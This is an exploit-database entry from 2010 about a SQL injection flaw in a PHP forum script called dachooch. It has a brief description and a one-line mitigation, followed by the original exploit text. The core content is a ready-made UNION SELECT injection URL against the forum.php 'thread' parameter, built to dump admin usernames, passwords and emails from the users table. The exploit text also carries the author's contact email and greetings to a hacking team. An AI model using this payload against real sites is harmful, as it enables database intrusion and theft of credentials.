Dachooch Remote Sql Injection Vulnerability

vendor:

dachooch

by:

Snakespc

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: dachooch

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Dachooch Remote Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a malicious SQL query in the form of a UNION statement that is appended to the original query. This statement allows the attacker to extract data from the database, such as usernames, passwords, and email addresses.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

==============================================================================
[»] Dachooch Remote Sql Injection Vulnerability
==============================================================================
  
[»] Script:   [dachooch ]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note:     [ Hna Rana Fi South Africa (Coupe du monde)  ]
  
###########################################################################
 ===[ Exploit ]=== 
  
[»] http://server/forum.php?mid=3&smid=0&group=3&thread=-3+UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),CHAR(115, 101, 99, 45, 119, 97, 114),5,6+from+users--
[»]Author: Snakespc <-
###########################################################################